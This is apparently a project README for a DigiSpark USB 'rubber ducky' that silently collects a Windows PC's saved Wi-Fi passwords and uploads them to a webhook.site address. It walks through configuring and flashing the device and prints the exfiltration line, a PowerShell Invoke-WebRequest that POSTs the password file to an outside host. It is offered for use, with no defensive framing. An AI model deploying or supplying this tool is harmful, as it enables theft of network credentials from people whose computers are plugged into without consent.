USB rubber ducky that grabs saved wifi password from pc and sends into a webhook site. This is highly inspired from Cyber Mentor's video.
-
Go to Webhook Site.
-
Copy your unique URL.
-
Download wifi-key-grab.ino file and edit it using Arduino IDE.
-
In line 42 or in the line of code below, change the webhook url to your unique URL.
DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/2265df61-338c-470f-a0ec-0f6011dc9a16 -Method POST -InFile Wi-Fi-PASS"); //Submitting all passwords on hook
- Once set, compile your program in Arduino IDE.
- Plug in your DigiSpark USB, then upload the program.
- Enjoy.
If ever you're going to use it again, make sure to repeat the steps again, as webhook URLs tend to reset after some time.